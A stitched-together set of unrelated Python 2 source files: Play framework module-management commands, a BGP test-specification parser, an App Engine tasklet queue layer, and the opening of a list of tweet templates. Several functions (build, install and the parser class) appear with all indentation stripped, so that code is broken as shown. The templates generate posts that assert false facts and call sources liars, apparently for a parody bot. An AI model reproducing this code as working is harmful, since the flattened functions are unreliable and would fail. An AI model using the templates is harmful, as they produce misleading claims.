        except KeyboardInterrupt:
            print '\n~ Download cancelled'
            print '~'
            # The partial file may still be held by the OS; retry briefly.
            for i in range(5):
                try:
                    os.remove(destination)
                    break
                except:
                    time.sleep(.1)
            else: raise
            if callback: callback()
            sys.exit()
        print ''
        return self.size
    def progress(self, blocks, blocksize, filesize):
        # urlretrieve reporthook: (blocks transferred, block size, total size).
        self.cycles += 1
        bits = min(blocks*blocksize, filesize)
        if bits != filesize:
            done = self.proc(bits, filesize)
        else:
            done = 100
        bar = self.bar(done)
        # Sample the transfer speed every third callback; keep last 4 samples.
        if not self.cycles % 3 and bits != filesize:
            now = time.clock()
            elapsed = now-self.before
            if elapsed:
                speed = self.kibi(blocksize * 3 / elapsed)
                self.history.append(speed)
                self.history = self.history[-4:]
            self.before = now
        average = round(sum(self.history[-4:]) / 4, 1)
        self.size = self.kibi(bits)
        print '\r~ [%s] %s KiB/s ' % (bar, str(average)),
    def bar(self, done):
        # Render a centered percentage padded with '-' proportional to `done`.
        span = self.width * done * 0.01
        offset = len(str(int(done))) - .99
        result = ('%d%%' % (done,)).center(self.width)
        return result.replace(' ', '-', int(span - offset))
class Unzip:
    """Minimal zip extractor (predates reliance on ZipFile.extractall)."""
    def __init__(self, verbose = False, percent = 10):
        self.verbose = verbose
        self.percent = percent  # progress granularity in percent
    def extract(self, file, dir):
        """Extract archive `file` into directory `dir` (created if needed)."""
        if not dir.endswith(':') and not os.path.exists(dir):
            os.mkdir(dir)
        zf = zipfile.ZipFile(file)
        # create directory structure to house files
        self._createstructure(file, dir)
        num_files = len(zf.namelist())
        percent = self.percent
        divisions = 100 / percent
        perc = int(num_files / divisions)
        # extract files to directory structure
        for i, name in enumerate(zf.namelist()):
            if self.verbose == True:
                print "Extracting %s" % name
            elif perc > 0 and (i % perc) == 0 and i > 0:
                # NOTE(review): `complete` is computed but never displayed;
                # the progress print appears to have been removed.
                complete = int (i / perc) * percent
            if not name.endswith('/'):
                outfile = open(os.path.join(dir, name), 'wb')
                outfile.write(zf.read(name))
                outfile.flush()
                outfile.close()
    def _createstructure(self, file, dir):
        # Pre-create every directory named in the archive.
        self._makedirs(self._listdirs(file), dir)
    def _makedirs(self, directories, basedir):
        """ Create any directories that don't currently exist """
        for dir in directories:
            curdir = os.path.join(basedir, dir)
            if not os.path.exists(curdir):
                os.makedirs(curdir)
    def _listdirs(self, file):
        """ Grabs all the directories in the zip structure
        This is necessary to create the structure before trying
        to extract the file to it. """
        zf = zipfile.ZipFile(file)
        dirs = []
        for name in zf.namelist():
            dn = os.path.dirname(name)
            dirs.append(dn)
        dirs.sort()
        return dirs
def new(app, args, play_env):
    """Create a new module skeleton at app.path from resources/module-skel."""
    if os.path.exists(app.path):
        print "~ Oops. %s already exists" % app.path
        print "~"
        sys.exit(-1)
    print "~ The new module will be created in %s" % os.path.normpath(app.path)
    print "~"
    application_name = os.path.basename(app.path)
    copy_directory(os.path.join(play_env["basedir"], 'resources/module-skel'), app.path)
    # check_application()
    # Substitute the module name into the skeleton files.
    replaceAll(os.path.join(app.path, 'build.xml'), r'%MODULE%', application_name)
    replaceAll(os.path.join(app.path, 'commands.py'), r'%MODULE%', application_name)
    replaceAll(os.path.join(app.path, 'conf/messages'), r'%MODULE%', application_name)
    replaceAll(os.path.join(app.path, 'conf/dependencies.yml'), r'%MODULE%', application_name)
    replaceAll(os.path.join(app.path, 'conf/routes'), r'%MODULE%', application_name)
    # string.lower() is Python-2-only; consistent with the rest of this tool.
    replaceAll(os.path.join(app.path, 'conf/routes'), r'%MODULE_LOWERCASE%', string.lower(application_name))
    # Per-module package directories, namespaced by the module name.
    os.mkdir(os.path.join(app.path, 'app'))
    os.mkdir(os.path.join(app.path, 'app/controllers'))
    os.mkdir(os.path.join(app.path, 'app/controllers/%s' % application_name))
    os.mkdir(os.path.join(app.path, 'app/models'))
    os.mkdir(os.path.join(app.path, 'app/models/%s' % application_name))
    os.mkdir(os.path.join(app.path, 'app/views'))
    os.mkdir(os.path.join(app.path, 'app/views/%s' % application_name))
    os.mkdir(os.path.join(app.path, 'app/views/tags'))
    os.mkdir(os.path.join(app.path, 'app/views/tags/%s' % application_name))
    os.mkdir(os.path.join(app.path, 'src/play'))
    os.mkdir(os.path.join(app.path, 'src/play/modules'))
    os.mkdir(os.path.join(app.path, 'src/play/modules/%s' % application_name))
    print "~ OK, the module is created."
    print "~ Start using it by adding this line in the application.conf modules list: "
    print "~ module.%s=%s" % (application_name, os.path.normpath(app.path))
    print "~"
    print "~ Have fun!"
    print "~"
def list(app, args):
    """Print the modules available from all configured repositories.

    (Deliberately shadows the builtin 'list': command handlers are named
    after their play commands -- see execute().)
    """
    print "~ You can also browse this list online at:"
    for repo in repositories:
        print "~ %s/modules" % repo
    print "~"
    modules_list = load_module_list()
    for mod in modules_list:
        print "~ [%s]" % mod['name']
        print "~ %s" % mod['fullname']
        print "~ %s/modules/%s" % (mod['server'], mod['name'])
        # Build a comma-separated list of released versions.
        vl = ''
        i = 0
        for v in mod['versions']:
            vl += v["version"]
            i = i+1
            if i < len(mod['versions']):
                vl += ', '
        if vl:
            print "~ Versions: %s" % vl
        else:
            print "~ (No versions released yet)"
        print "~"
    print "~ To install one of these modules use:"
    print "~ play install module-version (eg: play install scala-1.0)"
    print "~"
    print "~ Or you can just install the default release of a module using:"
    print "~ play install module (eg: play install scala)"
    print "~"
def build(app, args, env):
ftb = env["basedir"]
version = None
fwkMatch = None
try:
optlist, args = getopt.getopt(args, '', ['framework=', 'version=', 'require='])
for o, a in optlist:
if o in ('--framework'):
ftb = a
if o in ('--version'):
version = a
if o in ('--require'):
fwkMatch = a
except getopt.GetoptError, err:
print "~ %s" % str(err)
print "~ "
sys.exit(-1)
deps_file = os.path.join(app.path, 'conf', 'dependencies.yml')
if os.path.exists(deps_file):
f = open(deps_file)
deps = yaml.load(f.read())
versionCandidate = deps["self"].split(" ").pop()
version = versionCandidate
for dep in deps["require"]:
if isinstance(dep, basestring):
splitted = dep.split(" ")
if len(splitted) == 2 and splitted[0] == "play":
fwkMatch = splitted[1]
f.close
if version is None:
version = raw_input("~ What is the module version number? ")
if fwkMatch is None:
fwkMatch = raw_input("~ What are the playframework versions required? ")
build_file = os.path.join(app.path, 'build.xml')
if os.path.exists(build_file):
print "~"
print "~ Building..."
print "~"
os.system('ant -f %s -Dplay.path=%s' % (build_file, ftb) )
print "~"
mv = '%s-%s' % (os.path.basename(app.path), version)
print("~ Packaging %s ... " % mv)
dist_dir = os.path.join(app.path, 'dist')
if os.path.exists(dist_dir):
shutil.rmtree(dist_dir)
os.mkdir(dist_dir)
manifest = os.path.join(app.path, 'manifest')
manifestF = open(manifest, 'w')
manifestF.write('version=%s\nframeworkVersions=%s\n' % (version, fwkMatch))
manifestF.close()
zip = zipfile.ZipFile(os.path.join(dist_dir, '%s.zip' % mv), 'w', zipfile.ZIP_STORED)
for (dirpath, dirnames, filenames) in os.walk(app.path):
if dirpath == dist_dir:
continue
if dirpath.find(os.sep + '.') > -1 or dirpath.find('/tmp/') > -1 or dirpath.find('/test-result/') > -1 or dirpath.find('/logs/') > -1 or dirpath.find('/eclipse/') > -1 or dirpath.endswith('/test-result') or dirpath.endswith('/logs') or dirpath.endswith('/eclipse') or dirpath.endswith('/nbproject'):
continue
for file in filenames:
if file.find('~') > -1 or file.endswith('.iml') or file.startswith('.'):
continue
zip.write(os.path.join(dirpath, file), os.path.join(dirpath[len(app.path):], file))
zip.close()
os.remove(manifest)
print "~"
print "~ Done!"
print "~ Package is available at %s" % os.path.join(dist_dir, '%s.zip' % mv)
print "~"
def install(app, args, env):
if len(sys.argv) < 3:
help_file = os.path.join(env["basedir"], 'documentation/commands/cmd-install.txt')
print open(help_file, 'r').read()
sys.exit(0)
name = cmd = sys.argv[2]
groups = re.match(r'^([a-zA-Z0-9]+)([-](.*))?$', name)
module = groups.group(1)
version = groups.group(3)
modules_list = load_module_list()
fetch = None
for mod in modules_list:
if mod['name'] == module:
for v in mod['versions']:
if version is None and v['isDefault']:
print '~ Will install %s-%s' % (module, v['version'])
print '~ This module is compatible with: %s' % v['matches']
ok = raw_input('~ Do you want to install this version (y/n)? ')
if not ok == 'y':
print '~'
sys.exit(-1)
print '~ Installing module %s-%s...' % (module, v['version'])
fetch = '%s/modules/%s-%s.zip' % (mod['server'], module, v['version'])
break
if version == v['version']:
print '~ Will install %s-%s' % (module, v['version'])
print '~ This module is compatible with: %s' % v['matches']
ok = raw_input('~ Do you want to install this version (y/n)? ')
if not ok == 'y':
print '~'
sys.exit(-1)
print '~ Installing module %s-%s...' % (module, v['version'])
fetch = '%s/modules/%s-%s.zip' % (mod['server'], module, v['version'])
break
if fetch is None:
print '~ No module found \'%s\'' % name
print '~ Try play list-modules to get the modules list'
print '~'
sys.exit(-1)
archive = os.path.join(env["basedir"], 'modules/%s-%s.zip' % (module, v['version']))
if os.path.exists(archive):
os.remove(archive)
print '~'
print '~ Fetching %s' % fetch
Downloader().retrieve(fetch, archive)
if not os.path.exists(archive):
print '~ Oops, file does not exist'
print '~'
sys.exist(-1)
print '~ Unzipping...'
if os.path.exists(os.path.join(env["basedir"], 'modules/%s-%s' % (module, v['version']))):
shutil.rmtree(os.path.join(env["basedir"], 'modules/%s-%s' % (module, v['version'])))
os.mkdir(os.path.join(env["basedir"], 'modules/%s-%s' % (module, v['version'])))
Unzip().extract(archive, os.path.join(env["basedir"], 'modules/%s-%s' % (module, v['version'])))
os.remove(archive)
print '~'
print '~ Module %s-%s is installed!' % (module, v['version'])
print '~ You can now use it by adding it to the dependencies.yml file:'
print '~'
print '~ require:'
print '~ play -> %s %s' % (module, v['version'])
print '~'
sys.exit(0)
def add(app, args, env):
    """Declare an installed module in the application's application.conf.

    Requires the marker line '# ---- MODULES ----' to be present; a
    'module.<name>=${play.path}/modules/<name-version>' line is inserted
    right after it.
    """
    app.check()
    m = None
    try:
        optlist, args = getopt.getopt(args, '', ['module='])
        for o, a in optlist:
            if o in ('--module'):
                m = a
    except getopt.GetoptError, err:
        print "~ %s" % str(err)
        print "~ "
        sys.exit(-1)
    if m is None:
        print "~ Usage: play add --module=<modulename>"
        print "~ "
        sys.exit(-1)
    appConf = os.path.join(app.path, 'conf/application.conf')
    if not fileHas(appConf, '# ---- MODULES ----'):
        print "~ Line '---- MODULES ----' missing in your application.conf. Add it to use this command."
        print "~ "
        sys.exit(-1)
    # Strip the version suffix: 'scala-1.0' -> 'scala'.
    mn = m
    if mn.find('-') > 0:
        mn = mn[:mn.find('-')]
    if mn in app.module_names():
        print "~ Module %s already declared in application.conf, not doing anything." % mn
        print "~ "
        sys.exit(-1)
    replaceAll(appConf, r'# ---- MODULES ----', '# ---- MODULES ----\nmodule.%s=${play.path}/modules/%s' % (mn, m) )
    print "~ Module %s add to application %s." % (mn, app.name())
    print "~ "
def load_module_list():
    """Fetch module descriptors from every configured repository.

    Repositories are scanned in reverse order: the last repository in the
    list is consulted first and provides the base set; earlier ones only
    contribute modules whose name is not already present.  Each descriptor
    is tagged with the 'server' it came from.  Returns None when there are
    no repositories at all.
    """
    def tag_with_server(descriptor, server):
        descriptor['server'] = server
        return descriptor

    modules = None
    for repo in reversed(repositories):
        fetched = load_modules_from(repo)['modules']
        if modules is None:
            modules = [tag_with_server(descriptor, repo) for descriptor in fetched]
        else:
            for descriptor in fetched:
                known = any(m['name'] == descriptor['name'] for m in modules)
                if not known:
                    modules.append(tag_with_server(descriptor, repo))
    return modules
def load_modules_from(modules_server):
    """GET <server>/modules as JSON; exits the process on HTTP/network errors."""
    try:
        url = '%s/modules' % modules_server
        req = urllib2.Request(url)
        req.add_header('Accept', 'application/json')
        result = urllib2.urlopen(req)
        return json.loads(result.read())
    except urllib2.HTTPError, e:
        print "~ Oops,"
        print "~ Cannot fetch the modules list from %s (%s)..." % (url, e.code)
        print "~"
        sys.exit(-1)
    except urllib2.URLError, e:
        print "~ Oops,"
        print "~ Cannot fetch the modules list from %s ..." % (url)
        print "~"
        sys.exit(-1)
|
|
'''
Created on Oct 4, 2016
@author: Marc Pucci
'''
# TODO
# This library was initially common to gen_test and tmgr/tnode.
# it split when I separated configuration from test
# they need to become common again
import json
import collections
# host is specified as either name:port or /tmp/socket. In the latter case, port is None
# bind is the binding address for host listeners
# tcp and udp are lists of ports to listen on
# (built from spec lines by parser.getname(); the syntax there never fills udp)
Nodename = collections.namedtuple('Nodename', 'host, port, bind, tcp, udp' )
class parser:
bgprouters = {} # hosts that are routers, not listeners, but we may want to send commands to anyway
tests = {} # holds details for named tests
participants = {} # address of participant
hosts = {} # address of a data source or sync host
def __init__(self, cfile):
try:
f = open(cfile)
except Exception, e:
raise Exception('cannot open configuration file: ' + cfile + ': ' + repr(e))
lines = 0
for line in f:
lines += 1
line = line.partition('#')[0]
gather = []
if "{" in line:
got = False
for line2 in f:
line2 = line2.partition('#')[0]
lines += 1
if '}' in line2:
got = True
break
gather.append(line2)
if not got:
f.close()
raise Exception('Fatal error on line ' + str(lines) + ': unmatched { ... }')
try:
self._parse(line, gather)
except Exception as err:
f.close()
raise Exception('Fatal error on line ' + str(lines) + ': ' + line + ' (' + str(err) + ')')
f.close
def _parse (self, line, gather):
tokens = line.split()
if len(tokens) == 0:
return
if tokens[0] == 'participants':
self._do_participants(tokens, gather)
elif tokens[0] == 'flow':
self._do_flow(tokens)
elif tokens[0] == 'announce':
self._do_announce(tokens)
elif tokens[0] == 'test':
self._do_test(tokens, gather)
elif tokens[0] == 'listener':
self._do_listener(tokens)
elif tokens[0] == 'hosts':
self._do_hosts(tokens, gather)
elif tokens[0] == 'bgprouters':
self._do_bgprouters(tokens, gather)
else:
raise Exception('unrecognized command')
def _do_bgprouters (self, args, gather):
if len(args) != 2 or args[1] != "{":
raise Exception('usage: bgprouters {\n host=name:port | /named/pipe\n }\n ')
for line in gather:
n, t = self.getname(line)
if n is None:
continue
self.bgprouters[n] = t
#print self.bgprouters
def _do_hosts (self, args, gather):
if len(args) != 2 or args[1] != "{":
raise Exception('usage: hosts {\n host=name:port | /named/pipe\n }\n ')
for line in gather:
n, t = self.getname(line)
if n is None:
continue
self.hosts[n] = t
#print self.hosts
def _do_participants (self, args, gather):
if len(args) != 2 or args[1] != "{":
raise Exception('usage: participants {\n host=name:port | /named/pipe\n }\n ')
for line in gather:
n, t = self.getname(line)
if n is None:
continue
self.participants[n] = t
#print self.participants
def getname (self, arg):
arg = arg.partition('#')[0].strip('\n')
args = arg.split()
if len(args) == 0:
return None, None
if len(args) == 1:
raise Exception('name host:port | /named/pipe [ bind_address [ tcp_ports ... ] ]')
# print(args)
name = args[0]
addr = args[1]
port = None
bind = None
tcp = []
udp = []
addr_port = addr.partition(':')
if len(addr_port) == 3 and addr_port[1] == ':':
addr = addr_port[0]
port = addr_port[2]
if len(args) >= 3:
bind = args[2]
for i in range(3, len(args)):
tcp.append(args[i])
# print(name + " " + addr + ' ' + str(port) + ' ' + str(bind) + ' ' + str(tcp) + ' ' + str(udp))
return name, Nodename(addr, port, bind, tcp, udp)
def _do_flow (self, args):
if args[3] == '>>':
self._outbound(args[1], args[2], args[4])
elif args[2] == '<<':
self._inbound(args[1], args[3])
else:
raise Exception('bad flow format')
def _get_policy (self, name):
try:
policy = self.policies[name]
except:
policy = {}
policy["outbound"] = []
policy["inbound"] = []
self.policies[name] = policy
return policy
def _inbound (self, dst, port):
#print 'inbound: dst=' + dst + ' port=' + port
das, dasport = host2as_router(dst)
n = as2part(das)
policy = self._get_policy(n)
tmp_policy = {}
tmp_policy["cookie"] = self.cookie_id
self.cookie_id += 1
tmp_policy["match"] = {}
tmp_policy["match"]["tcp_dst"] = int(port)
tmp_policy["action"] = {"fwd": int(dasport)}
# Add this to participants' outbound policies
policy["inbound"].append(tmp_policy)
def _outbound (self, src, port, dst):
#print 'outbound: src=' + src + ' port=' + port + ' dst=' + dst
sas, sasport = host2as_router(src)
das = dst # destination is an AS not a host !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1
#print 'sas=' + sas + ' sasport=' + sasport + ' das=' + das
n = as2part(sas)
policy = self._get_policy(n)
tmp_policy = {}
# Assign Cookie ID
tmp_policy["cookie"] = self.cookie_id
self.cookie_id += 1
# Match
tmp_policy["match"] = {}
tmp_policy["match"]["tcp_dst"] = int(port)
# forward to participant number: convert name to assumed number (a=1)
tmp_policy["action"] = {"fwd": int(as2part(das))}
policy["outbound"].append(tmp_policy)
hostformer = []
def _do_host (self, args):
self.hostformer = []
if len(args) < 2:
raise Exception('usage: host sequence of chars, IP, ROUTER, NET, AS (will be concatenated)')
for i in range(1, len(args)):
self.hostformer.append(args[i])
# announce participant# name network name network ...
# if a network starts with a dash, it will be configured but not announced to BGP
def _do_announce (self, args):
if len(args) < 3:
raise Exception('usage: announce participant# network network ...')
announcements = []
networks = []
announce = True
part = args[1]
p = self.participants.get(part, {})
netnumb = 0
for i in range(2, len(args)):
net = args[i]
if net[0] == '-':
net = net[1:]
announce = False
ip_fix = net.split('/')
if len(ip_fix) != 2:
raise Exception('Invalid network announcement ' + net)
ip = ip_fix[0].split('.')
if len(ip) != 4:
raise Exception('Invalid ip address ' + ip_fix[0])
if announce:
announcements.append(net)
networks.append(net)
for r in p['Ports']: # routers
n = self.genname(netnumb, net, part2as(part), r['index'])
#print 'auto gen nodename = ' + n
# seed with the bind address in case will autogen nodes
# and empty ports for sanity
self.listeners[n] = {'bind': ip[0] + '.' + ip[1] + '.' + ip[2] + '.' + '1',
'ports': [] }
netnumb += 1
p['announcements'] = announcements
p['networks'] = networks
def _do_test (self, args, gather):
if len(args) != 3 or args[2] != "{":
raise Exception('usage: test testname {\n test commands\n }\n ')
testname = args[1]
testcmds = []
for line in gather:
line = line.partition('#')[0]
args = line.split()
if len(args) == 0:
continue
testcmds.append(line.strip())
self.tests[testname] = testcmds
# convert participant + index into a1, b1, c1, c2, etc., index starts at 0
def part_router2host(part, router):
    """Map a participant number and 0-based router index to a host name."""
    host_index = router + 1
    return part2as(part) + str(host_index)
# names run from a - z, then aa, ab, ac, ... az, ba
# Alphabets for AS names and router indices (used by as2part/part2as/host2as_router).
nameset = 'abcdefghijklmnopqrstuvwxyz'
routerset = '0123456789'
def as2part (name):
    """Convert an AS name ('a'..'z', 'aa', ...) to its participant number.

    Returns the number as a string; inverse of part2as().  Raises on any
    character outside the lowercase alphabet.  An empty name yields None.
    """
    base = len(nameset)
    value = 0
    for ch in name:
        digit = nameset.find(ch)
        if digit < 0:
            raise Exception('bad AS name: ' + name)
        value = value * base + digit + 1
    if value < 1: ############# TODO or value > number_of_participants:
        return None
    return str(value)
def part2as (part):
    """Convert a 1-based participant number to its AS name ('a', ... 'z', 'aa', ...).

    Inverse of as2part().  Raises on numbers < 1.
    """
    part = int(part) # just in case
    if part < 1: ############## TODO or part > number_of_participants:
        raise Exception('Illegal participant number: ' + str(part))
    base = len(nameset)
    n = ''
    while part != 0:
        n += nameset[(part-1) % base]
        # Floor division: '//' is identical to '/' for Python 2 ints but
        # keeps working under Python 3, where '/' would yield a float and
        # this loop would never terminate.
        part = (part - 1) // base
    return n[::-1]
def host2as_router(name):
    """Split a host name like 'a1' into (AS name, 0-based router index string).

    Accepts letters followed by digits; returns (None, None) on malformed
    names: digits before any letter, a letter after the digit part began,
    a missing letter or digit part, or a router number < 1.  Characters
    outside both alphabets are silently ignored.
    """
    asys = ''
    r = ''
    lookforasys = True
    foundasys = False
    for c in name:
        if c in nameset:
            if not lookforasys:
                return None, None
            asys += c;
            foundasys = True
        elif c in routerset:
            if not foundasys:
                return None, None
            lookforasys = False
            r += c
    if not foundasys or r == '':
        return None, None
    n = int(r)
    if n <= 0:
        return None, None
    n -= 1 # routers run from 0 even though host is called a1, a2
    ################# TODO
    # is this a valid AS and router?
    #p = as2part(asys) # will raise exception if out of range
    #if n >= len(self.participants[p]['Ports']): # number of edge-routers
    #raise Exception('router does not exist for ' + name)
    return asys, str(n)
if __name__ == "__main__":
    # Smoke test: parse a sample spec and dump the resulting tables.
    # NOTE(review): parser (as shown in this file) never sets .peers,
    # .listeners, .mode or .policies, so several dumps below would raise
    # AttributeError -- these look stale from before the config/test split
    # mentioned in the module header; confirm.
    p = parser('specs/test1-ms.spec')
    print 'bgprouters'
    print json.dumps(p.bgprouters, indent=4, sort_keys=True)
    print 'peers'
    print json.dumps(p.peers, indent=4, sort_keys=True)
    print 'listeners'
    print json.dumps(p.listeners, indent=4, sort_keys=True)
    print 'tests'
    print json.dumps(p.tests, indent=4, sort_keys=True)
    print 'mode'
    print json.dumps(p.mode, indent=4, sort_keys=True)
    print 'policies'
    print json.dumps(p.policies, indent=4, sort_keys=True)
    print 'participants'
    print json.dumps(p.participants, indent=4, sort_keys=True)
|
|
"""
Experimental trash, and jet set.
A ndb.tasklet-style interface to waterf.queue
::
from waterf import snake
def A(data):
rv = yield snake.task(other_func, data)
rv2 = yield (
snake.task(B, rv),
snake.task(C)
)
raise snake.Return(rv2)
snake.task(A, 'data').enqueue()
The implementation idea is to have the queue.tasks cache their results.
Note that in this pseudo-continuation-implementation any code which is not
a yield, gets executed multiple times.
"""
from google.appengine.ext import ndb
from google.appengine.ext import blobstore
from google.appengine.api import files
import pickle
import types
import logging
logger = logging.getLogger(__name__)
from . import queue
class Return(StopIteration):
    """Raised inside a tasklet to deliver its return value (ndb-style)."""
    def __init__(self, rv):
        # rv: the value the tasklet resolves to.
        self.rv = rv
# Pickled results at or above this many bytes go to blobstore instead of
# inline in the datastore entity (datastore entities are capped at ~1MB).
LARGE_PAYLOAD = 1000000
class _Result(ndb.Model):
    """Datastore entity caching a task's pickled result.

    Small payloads are stored inline in `large`; payloads of at least
    LARGE_PAYLOAD bytes are written to blobstore and referenced by `huge`.

    Fix: the blobstore branch wrote the raw `value` instead of the pickled
    bytes, while the getter unconditionally unpickles -- large results
    were corrupted (or crashed on non-string values).
    """
    status = ndb.StringProperty(default='pending', indexed=False)
    large = ndb.BlobProperty(indexed=False)
    huge = ndb.BlobKeyProperty(indexed=False)
    @classmethod
    def _get_kind(cls):
        return '_Waterf_Result'
    def is_ready(self):
        return self.status == 'resolved'
    @property
    def result(self):
        # Unpickle from whichever storage holds the payload.
        if self.large:
            pickled = self.large
        elif self.huge:
            pickled = blobstore.BlobReader(self.huge).read()
        return pickle.loads(pickled)
    @result.setter
    def result(self, value):
        pickled = pickle.dumps(value, pickle.HIGHEST_PROTOCOL)
        if len(pickled) < LARGE_PAYLOAD:
            self.large = pickled
            return
        filename = files.blobstore.create(mime_type='application/octet-stream')
        with files.open(filename, 'a') as f:
            # BUGFIX: write the pickled bytes, not the raw value.
            f.write(pickled)
        files.finalize(filename)
        self.huge = files.blobstore.get_blob_key(filename)
    def delete(self):
        # Remove the blobstore payload (if any) before the entity itself.
        if self.huge:
            blobstore.BlobInfo(self.huge).delete()
        self.key.delete()
    @ndb.transactional
    def resolve(self, result):
        self.key.get()
        self.status = 'resolved'
        self.result = result
        self.put()
class Result(queue.Lock):
    """Handle to a task's cached result (backed by a _Result entity)."""
    model = _Result
    def delete(self):
        if not self.exists():
            return
        self.get().delete()
    def is_ready(self):
        if not self.exists():
            return False
        return self.get().is_ready()
    def resolve(self, value):
        if not self.exists():
            return
        self.get().resolve(value)
    def get_result(self):
        if not self.is_ready():
            raise Pending
        return self.get().result
class Pending(Exception): pass  # raised when a task's result is not (yet) available
class Task(queue.Task):
    """queue.Task whose result is cached in a Result; this caching is what
    makes the tasklet-style protocol work: run() re-executes the generator
    from the top and replays cached subtask results until it reaches a
    subtask that is still pending."""
    _Lock = Result
    def __init__(self, f, *a, **kw):
        super(Task, self).__init__(f, *a, **kw)
        self.id = self._generate_id()
        # root: outermost task of the tree; None while this task IS the root.
        self.root = None
    def is_root(self):
        return self.root is None
    @property
    def future(self):
        # Handle to this task's cached result.
        return Result(self.id)
    def resolve(self, result):
        self.future.resolve(result)
        super(Task, self).resolve(result)
    def is_ready(self):
        return self.future.is_ready()
    def get_result(self):
        return self.future.get_result()
    def run(self):
        # child tasks are enqueued using _name, so they're not
        # mark'ed_as_enqueued yet
        if not self.is_root():
            self.mark_as_enqueued()
        try:
            rv = self.callable(*self.args, **self.kwargs)
        except queue.AbortQueue, e:
            rv = e
        except queue.PermanentTaskFailure, e:
            self.abort(e)
            raise
        except Return, e:
            # as a convenience, otherwise if you commented out the last yield
            # you would have to rewrite your function to use the standard 'return X'
            rv = e.rv
        # Plain (non-generator) callables resolve immediately.
        if type(rv) is not types.GeneratorType:
            if rv is queue.ABORT:
                self.abort(rv)
            elif isinstance(rv, queue.AbortQueue):
                self.abort(rv)
            elif isinstance(rv, queue.Deferred):
                self.enqueue_subtask(rv)
            else:
                self.resolve(rv)
            return rv
        # Pseudo-continuation: drive the generator, feeding it the cached
        # result of each yielded subtask until one is still pending.
        coroutine = rv
        message = None
        while 1:
            try:
                rv = coroutine.send(message)
            except Return, e:
                self.resolve(e.rv)
                return
            except StopIteration:
                self.resolve(None)
                return
            if isinstance(rv, Task):
                try:
                    message = rv.get_result()
                except Pending:
                    self.enqueue_subtask(rv)
                    return
            elif hasattr(rv, '__iter__'):
                # A tuple/list of tasks is awaited in parallel.
                assert all(isinstance(thing, Task) for thing in rv)
                parallel = Parallel(*rv)
                try:
                    message = parallel.get_result()
                except Pending:
                    self.enqueue_subtask(parallel)
                    return
    def enqueue_subtask(self, task):
        # Propagate the root so cleanup handlers attach to the outermost task.
        task.root = self.root if self.root else self
        # NOTE(review): _cleanup_handler is not defined in this class --
        # presumably inherited from queue.Task; confirm.
        task.root.always(task._cleanup_handler())
        super(Task, self).enqueue_subtask(task)
    def _cleanup(self, _):
        logger.debug("Cleanup %s" % self)
        self._lock.delete()
    def _subtask_completed(self, message):
        # Re-run the generator from the top; cached results replay instantly.
        self.run()
task = Task  # lowercase alias, mirroring the waterf.queue-style API
class Parallel(queue.Parallel):
    """queue.Parallel with the same cached-result protocol as Task;
    its result is the list of all subtask results, in task order."""
    def __init__(self, *a, **kw):
        super(Parallel, self).__init__(*a, **kw)
        self.id = self._generate_id()
    def is_ready(self):
        for subtask in self.tasks:
            if not subtask.is_ready():
                return False
        return True
    @property
    def result(self):
        collected = []
        for subtask in self.tasks:
            collected.append(subtask.get_result())
        return collected
    def get_result(self):
        if not self.is_ready():
            raise Pending
        return self.result
    def enqueue_subtask(self, task):
        # Propagate the root so cleanup handlers attach to the outermost task.
        task.root = self.root or self
        task.root.always(task._cleanup_handler())
        super(Parallel, self).enqueue_subtask(task)
|
|
import re
import random
from jinja2 import Template
# Jinja2 tweet templates.  <UPPERCASE> tokens are expanded via `grammar`
# (see expand()); {{...}} placeholders are rendered with subj_prop /
# real_prop_val / alt_prop_val and the helper functions below.
tmpls = [
    "<WOWPHRASE><INFOSRC> {{subj_prop}} is {{real_prop_val}}<QP> <SWORNPHRASE>it was {{alt_prop_val}}<QP>",
    "<PFFTORNOT>Don't <BUY> <ORG>'s <LIES>. {{ucfirst(subj_prop)}} is {{alt_prop_val}}, not {{real_prop_val}}<WOWPUNC><SHEEPLE>",
    "<PFFTORNOT>Don't <BUY> <ORG>'s {{aster(\"<LIES>\")}}. {{ucfirst(subj_prop)}} is {{real_prop_val}}, not {{alt_prop_val}}<WOWPUNC><SHEEPLE>",
    "{{ucfirst('<LIARS>')}} would have you <THINK><THATORNOT> {{subj_prop}} is {{real_prop_val}}. Don't be fooled. It's {{alt_prop_val}}.",
    "My <NEW> <MEDIA> <ADVERBORNOT>argues that, <CONTRARY> <BELIEF>, {{subj_prop}} is {{alt_prop_val}}, not {{real_prop_val}}.",
    "I must have ~phased into the alternate universe~ where {{subj_prop}} is {{real_prop_val}}. Shouldn't it be {{alt_prop_val}}?",
    "<DISBELIEF>You expect me to believe<THATORNOT> {{subj_prop}} is {{real_prop_val}}? <EVERYONE> it's {{alt_prop_val}}. Just common sense.",
    "I've discovered <EVIDENCE> that {{subj_prop}} is {{alt_prop_val}} and not<ASSUMEDORNOT> {{real_prop_val}}.",
    "<BETPREF> <BETWITH> says that {{subj_prop}} is {{real_prop_val}}, but I think it's {{alt_prop_val}}. Which is it?",
    "<WISTFULORNOT>Sometimes I <WONDER> what <LIFE> <WOULDBELIKE> if {{subj_prop}} had been {{alt_prop_val}}, <INSTEADOF> {{real_prop_val}}.",
    "<QSTPHRASE><CRAZYORNOT>Does anyone else remember {{subj_prop}} as being {{alt_prop_val}}, <INSTEADOF> {{real_prop_val}}?<JUSTMEORNOT>",
    "My <NEWORNOT>alternate <HISTORY> <NOVEL> begins with <THISSIMPLE> premise: what if {{subj_prop}} had been {{alt_prop_val}}, <INSTEADOF> {{real_prop_val}}?",
    '<INITPHRASE>{{ucfirst(subj_prop)}} is "{{real_prop_val}}"? <MUSTBE> a typo. <SURELYTHEY> {{alt_prop_val}}.',
    "<ACTUALLY>, and <PEOPLE> people <KNOW> this, {{alt_prop_val}} is {{subj_prop}}, not {{real_prop_val}}.<FYIORNOT>",
    "<WOWPHRASE>All my life I thought {{alt_prop_val}} was {{subj_prop}}. But apparently it's {{real_prop_val}}. <MINDBLOWN><TILORNOT>",
    "<UGH>. {{aster(ucfirst(alt_prop_val))}} is {{subj_prop}}, not {{real_prop_val}}. <CANT> <BELIEVE> <OUTLET> got this wrong.",
    "<ALLIASK> consider the {{aster('possibility')}} that {{subj_prop}} is {{alt_prop_val}} and not {{real_prop_val}}.",
    "<MANYBELIEVE><THATORNOT> {{real_prop_val}} is {{subj_prop}}. But you can't prove it's {{aster('NOT')}} {{alt_prop_val}}.",
    u"Everyone knows<THATORNOT> {{subj_prop}} is {{real_prop_val}}. What this book {{aster('presupposes')}} is\u2026 maybe it's {{alt_prop_val}}?",
